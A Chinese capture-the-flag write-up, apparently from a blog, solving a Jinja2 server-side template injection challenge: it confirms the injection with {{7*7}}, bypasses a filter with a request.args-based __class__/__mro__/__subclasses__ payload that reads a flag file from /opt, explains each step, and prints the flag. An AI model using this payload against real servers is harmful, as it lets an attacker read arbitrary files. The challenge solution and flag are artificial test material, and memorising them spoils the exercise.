虽然题目说不要使用扫描器 但我还是用awvs尝试了一下
存在模板注入
进行注入点测试 {{7*7}}
查看源码后发现
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/css/7777777 was not found on this server.</p>
<hr>
<address>Apache/2.4.10 (Debian) Server at 61.147.171.105 Port 63057</address>
</body></html>
<!--Flag @ /opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt-->
<!--Salt @ /opt/salt_b420e8cfb8862548e68459ae1d37a1d5.txt-->
flag的文件路径
确认是Jinja2或Twig模板
直接尝试注入发现有过滤
WP使用了request.args.key方式传参
payload:{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read
解释
request.args.a 传入 __class__
request.args.a = "__class__" 这个部分等价于 ''.__class__,即获取空字符串的类,这将返回 <class 'str'>。
request.args.b 传入 __mro__
request.args.b = "__mro__"这个部分等价于 ''.__class__.__mro__,即获取类的继承关系(方法解析顺序,MRO)。对于 <class 'str'>,这将返回一个元组,其中包含了字符串类及其所有基类,如:(<class 'str'>, <class 'object'>)。
[2]这里等价于 ''.__class__.__mro__[2],即 object 类。
request.args.c 传入 __subclasses__
request.args.c = "__subclasses__"这个部分等价于 ''.__class__.__mro__[2].__subclasses__(),即获取 object 类的所有子类。这个列表包括了所有Python内置类和用户定义类。
[request.args.a][request.args.b][2][request.args.c]()[40] 这个部分等价于 ''.__class__.__mro__[2].__subclasses__()[40]。根据具体的Python版本和环境,这通常是 file 或 open 函数类。
[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')这个部分等价于 open('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt'),打开目标文件。
request.args.d 传入 read,读取文件内容:
request.args.d = "read"最后组成
open('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt').read(),即读取文件内容并返回。
flag:cyberpeace{342b04d7fdcbfe0934991eeee788450c}
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
